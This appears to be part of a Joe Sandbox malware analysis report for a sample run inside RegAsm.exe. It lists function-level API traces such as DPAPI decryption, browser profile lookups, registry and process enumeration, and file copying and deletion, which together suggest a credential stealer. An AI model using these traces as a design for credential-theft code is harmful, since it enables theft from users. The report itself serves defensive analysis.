                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: H_prolog$lstrcpy$File$AllocLocallstrcatlstrlen$CloseCreateHandleReadSize
                                                                                    • String ID: ^userContextId=4294967295$moz-extension+++
                                                                                    • API String ID: 2813378046-3310892237
                                                                                    • Opcode ID: 384d4e0ce00402dfda07b866f8a0d6dbf308a042ebcec32dbebc7ac094264ded
                                                                                    • Instruction ID: 4f6f4bd48829af219670311540be59081c9cea49b359b7f79f2b82a8f20ba16d
                                                                                    • Opcode Fuzzy Hash: 384d4e0ce00402dfda07b866f8a0d6dbf308a042ebcec32dbebc7ac094264ded
                                                                                    • Instruction Fuzzy Hash: F6715D70905248AACB14FBE5D516BDDBBB4AF19308F50417EE805736C2DB78670CCB66
                                                                                    Function 004064E5 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 153libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 004064EA
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                      • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                      • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                                      • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                      • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                      • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                      • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                      • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                      • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                    • GetEnvironmentVariableA.KERNEL32(C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF,00000000,?,?,00425B44,?,?,?,00425B3F,?), ref: 004065A7
                                                                                      • Part of subcall function 0040F997: lstrlenA.KERNEL32(?,00000000,?,004169B9,0042655F,0042655E,00000000,00000000,?,00417314), ref: 0040F9A0
                                                                                      • Part of subcall function 0040F997: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F9D4
                                                                                    • SetEnvironmentVariableA.KERNEL32(00000000,00000000,?,?,?,00425B48,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,00425B43), ref: 0040661F
                                                                                    • LoadLibraryA.KERNEL32(00000000), ref: 0040663A
                                                                                    Strings
                                                                                    • C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;, xrefs: 0040659B, 004065A0, 004065BA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcpy$H_prolog$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                                                                                    • String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;
                                                                                    • API String ID: 757424748-1193256905
                                                                                    • Opcode ID: f6ce9d2092b8488091eba00a9cdcecb47d6563a634a2b248d5590a137b97323b
                                                                                    • Instruction ID: b62f1dd5ee535d8e5f8645b721c07d1aad3572f7288e272c7e543ebc5a1b68b9
                                                                                    • Opcode Fuzzy Hash: f6ce9d2092b8488091eba00a9cdcecb47d6563a634a2b248d5590a137b97323b
                                                                                    • Instruction Fuzzy Hash: 7B617170801544EECB25EBA4EA15AEDBBB5EB28304F10507EE506736E2DB381A09CF65
                                                                                    Function 0040C186 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 0040C18B
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                      • Part of subcall function 0040618B: _EH_prolog.MSVCRT ref: 00406190
                                                                                      • Part of subcall function 0040618B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061B3
                                                                                      • Part of subcall function 0040618B: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004061CA
                                                                                      • Part of subcall function 0040618B: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061E6
                                                                                      • Part of subcall function 0040618B: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406200
                                                                                      • Part of subcall function 0040618B: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406221
                                                                                      • Part of subcall function 00410D6D: LocalAlloc.KERNEL32(00000040,004131CC,000000C8,00000001,?,004131CB,00000000,00000000), ref: 00410D86
                                                                                    • StrStrA.SHLWAPI(00000000,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0040C1DE
                                                                                      • Part of subcall function 00406242: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,004058F9,00000000,00000000), ref: 00406262
                                                                                      • Part of subcall function 00406242: LocalAlloc.KERNEL32(00000040,004058F9,?,?,004058F9,00000000,?,?), ref: 00406270
                                                                                      • Part of subcall function 00406242: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,004058F9,00000000,00000000), ref: 00406286
                                                                                      • Part of subcall function 00406242: LocalFree.KERNEL32(00000000,?,?,004058F9,00000000,?,?), ref: 00406295
                                                                                    • memcmp.MSVCRT ref: 0040C21C
                                                                                      • Part of subcall function 004062A5: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 004062C8
                                                                                      • Part of subcall function 004062A5: LocalAlloc.KERNEL32(00000040,?,?), ref: 004062E0
                                                                                      • Part of subcall function 004062A5: LocalFree.KERNEL32(?), ref: 004062FE
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Local$Alloc$CryptFile$BinaryFreeH_prologString$CloseCreateDataHandleReadSizeUnprotectlstrcpymemcmp
                                                                                    • String ID: $DPAPI
                                                                                    • API String ID: 2477620391-1819349886
                                                                                    • Opcode ID: 7fde57cfb3e23f25c5826063d9561d751b6fe279c762ca7b9769f1475c596470
                                                                                    • Instruction ID: 8b9103f373224ef9c7d1e1e34525f01fb5e997a78b4ac406efbcf79e04d5bcd8
                                                                                    • Opcode Fuzzy Hash: 7fde57cfb3e23f25c5826063d9561d751b6fe279c762ca7b9769f1475c596470
                                                                                    • Instruction Fuzzy Hash: 8B21A272D00109ABCF10ABE5CD42AEFBB79AF54314F14027BF901B11D2EA399A958699
                                                                                    Function 0041064B Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40memoryregistryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetProcessHeap.KERNEL32(00000000,00000104,00000001,?,?,?,00414A17,00000000,?,Windows: ,00000000,?,004265CC,00000000,?,Work Dir: In memory), ref: 0041065F
                                                                                    • HeapAlloc.KERNEL32(00000000,?,?,?,00414A17,00000000,?,Windows: ,00000000,?,004265CC,00000000,?,Work Dir: In memory,00000000,?), ref: 00410666
                                                                                    • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00000000,?,?,?,00414A17,00000000,?,Windows: ,00000000,?,004265CC,00000000,?), ref: 00410694
                                                                                    • RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,000000FF,?,?,?,00414A17,00000000,?,Windows: ,00000000,?,004265CC,00000000), ref: 004106B0
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Heap$AllocOpenProcessQueryValue
                                                                                    • String ID: Windows 11
                                                                                    • API String ID: 3676486918-2517555085
                                                                                    • Opcode ID: 5f1e27fdb62b933d2b61b99a876454972edf3bd6176160e80f00ebf938befaf3
                                                                                    • Instruction ID: 104df8f2525a0fd679668ea989e6de38b513391d3ca0bb797f84468fdfaa6df1
                                                                                    • Opcode Fuzzy Hash: 5f1e27fdb62b933d2b61b99a876454972edf3bd6176160e80f00ebf938befaf3
                                                                                    • Instruction Fuzzy Hash: 19F06279640215FBEB209BD1DD0AFAA7A7EEB49B04F201075FB01E61A0D7B49A509B24
                                                                                    Function 0040FB50 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 37memoryregistryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,0040FBC2,00410673,?,?,?,00414A17,00000000,?,Windows: ,00000000), ref: 0040FB64
                                                                                    • HeapAlloc.KERNEL32(00000000,?,?,?,0040FBC2,00410673,?,?,?,00414A17,00000000,?,Windows: ,00000000,?,004265CC), ref: 0040FB6B
                                                                                    • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00000000,?,?,?,0040FBC2,00410673,?,?,?,00414A17,00000000,?,Windows: ), ref: 0040FB89
                                                                                    • RegQueryValueExA.KERNEL32(00000000,CurrentBuildNumber,00000000,00000000,00000000,000000FF,?,?,?,0040FBC2,00410673,?,?,?,00414A17,00000000), ref: 0040FBA4
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Heap$AllocOpenProcessQueryValue
                                                                                    • String ID: CurrentBuildNumber
                                                                                    • API String ID: 3676486918-1022791448
                                                                                    • Opcode ID: b9bf53c9aadd1465afb422ec0005ef8ef59a9f86fcd7e1a7c6fd75589dd59d58
                                                                                    • Instruction ID: 38c23b2a009fde1c93731900e80abf8fdc92a9d8531a5489515771ffac6c83d0
                                                                                    • Opcode Fuzzy Hash: b9bf53c9aadd1465afb422ec0005ef8ef59a9f86fcd7e1a7c6fd75589dd59d58
                                                                                    • Instruction Fuzzy Hash: 20F03076240214FBFB109BD1DC0FFAE7A7EEB45B44F101069F701A50A0D7B569409B24
                                                                                    Function 0040913E Relevance: 7.8, APIs: 5, Instructions: 274filestringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 00409143
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                      • Part of subcall function 00410B5C: _EH_prolog.MSVCRT ref: 00410B61
                                                                                      • Part of subcall function 00410B5C: GetSystemTime.KERNEL32(?,00426440,00000001,000000C8,00000000,00426562), ref: 00410BA1
                                                                                      • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                      • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                                      • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                      • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                      • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                      • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                      • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                      • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                    • CopyFileA.KERNEL32(00000000,00000000,00000001,00000000,?,00000000,?,00425DB4,?,?,?,00425B9B,00000000), ref: 0040921D
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 004093E4
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 004093F8
                                                                                    • DeleteFileA.KERNEL32(00000000), ref: 0040947A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: H_prologlstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                                                    • String ID:
                                                                                    • API String ID: 3423466546-0
                                                                                    • Opcode ID: 11db608995ccd72e57995140e9430edd233334ab05fc65fed0a96f20b0681f76
                                                                                    • Instruction ID: 49701c4b31c8d318cf39a30ad3edccb9fb9ad7eb1a88c61520d5ae36ab01da66
                                                                                    • Opcode Fuzzy Hash: 11db608995ccd72e57995140e9430edd233334ab05fc65fed0a96f20b0681f76
                                                                                    • Instruction Fuzzy Hash: 64B14A71904248EACB15EBE4D965BDDBBB4AF28308F54407EE406735C2DB782B0DDB26
                                                                                    Function 6CC4C930 Relevance: 7.6, APIs: 5, Instructions: 83memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetSystemInfo.KERNEL32(?), ref: 6CC4C947
                                                                                    • VirtualAlloc.KERNEL32(?,?,00002000,00000001), ref: 6CC4C969
                                                                                    • GetSystemInfo.KERNEL32(?), ref: 6CC4C9A9
                                                                                    • VirtualFree.KERNEL32(00000000,?,00008000), ref: 6CC4C9C8
                                                                                    • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001), ref: 6CC4C9E2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: Virtual$AllocInfoSystem$Free
                                                                                    • String ID:
                                                                                    • API String ID: 4191843772-0
                                                                                    • Opcode ID: cbc0b3ac0dd6c7632f84ec0c944eb9480f917d19491a2713eb1c4f9d20d1458c
                                                                                    • Instruction ID: 60f21c85aeb019d5848d221ca7b1e7ce2efbc21e33a6eafe329d22d99e633b92
                                                                                    • Opcode Fuzzy Hash: cbc0b3ac0dd6c7632f84ec0c944eb9480f917d19491a2713eb1c4f9d20d1458c
                                                                                    • Instruction Fuzzy Hash: 8F21F935741614BBDB04AEB9DCD4BAE73B9BB46704F50852AF903A7B40FB705C048794
                                                                                    Function 004102C3 Relevance: 7.6, APIs: 5, Instructions: 70processCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 004102C8
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00410303
                                                                                    • Process32First.KERNEL32(00000000,00000128), ref: 00410314
                                                                                    • Process32Next.KERNEL32(?,00000128), ref: 0041037C
                                                                                    • CloseHandle.KERNEL32(?,?,00000000), ref: 00410389
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Process32$CloseCreateFirstH_prologHandleNextSnapshotToolhelp32lstrcpy
                                                                                    • String ID:
                                                                                    • API String ID: 599723951-0
                                                                                    • Opcode ID: 2fc1f2962bdb036bcc7fb993ace66804accd746089eb9d5784e12931c34da8f2
                                                                                    • Instruction ID: a4a97019f206722b2e8740589aebd7bc91867f573d1150960a86d602fc248a9b
                                                                                    • Opcode Fuzzy Hash: 2fc1f2962bdb036bcc7fb993ace66804accd746089eb9d5784e12931c34da8f2
                                                                                    • Instruction Fuzzy Hash: 23210CB1A00118EBCB10EFA5CD55AEEBBB9AF58348F50407EE405F3691CB785A488B65
                                                                                    Function 004024D7 Relevance: 7.5, APIs: 5, Instructions: 39memorystringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • memset.MSVCRT ref: 004024F0
                                                                                      • Part of subcall function 0040245C: memset.MSVCRT ref: 00402481
                                                                                      • Part of subcall function 0040245C: CryptStringToBinaryA.CRYPT32(00000104,00000000,00000001,00000000,?,00000000,00000000), ref: 004024A7
                                                                                      • Part of subcall function 0040245C: CryptStringToBinaryA.CRYPT32(00000104,00000000,00000001,?,?,00000000,00000000), ref: 004024C1
                                                                                    • strcat.MSVCRT(?,00000000,?,?,00000000,00000104), ref: 00402505
                                                                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00402510
                                                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00402517
                                                                                      • Part of subcall function 00402308: ??_U@YAPAXI@Z.MSVCRT ref: 0040238D
                                                                                    • memset.MSVCRT ref: 00402540
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: memset$BinaryCryptHeapString$AllocateProcessstrcat
                                                                                    • String ID:
                                                                                    • API String ID: 3248666761-0
                                                                                    • Opcode ID: a641902682074bfb60fea3bc3b21c2ff598bd00ccde1354f0615c18b64d23653
                                                                                    • Instruction ID: 5936fd312f401cb4099e43ed518250dd8d8a99da873d70e406837ce1c28814d2
                                                                                    • Opcode Fuzzy Hash: a641902682074bfb60fea3bc3b21c2ff598bd00ccde1354f0615c18b64d23653
                                                                                    • Instruction Fuzzy Hash: BCF044B6C0021CB7CB10BBA4DD49FCA777C9F14304F0000A6BA45F2081DAB497C4CBA4
                                                                                    Function 0040D6BB Relevance: 7.5, APIs: 2, Strings: 2, Instructions: 454COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 0040D6C0
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                    • StrCmpCA.SHLWAPI(00000000,Opera GX,00425BC6,00425BC3,?,?,?), ref: 0040D70A
                                                                                      • Part of subcall function 00410D21: SHGetFolderPathA.SHELL32(00000000,;\B,00000000,00000000,?), ref: 00410D52
                                                                                      • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                      • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                      • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                      • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                      • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                      • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                                      • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
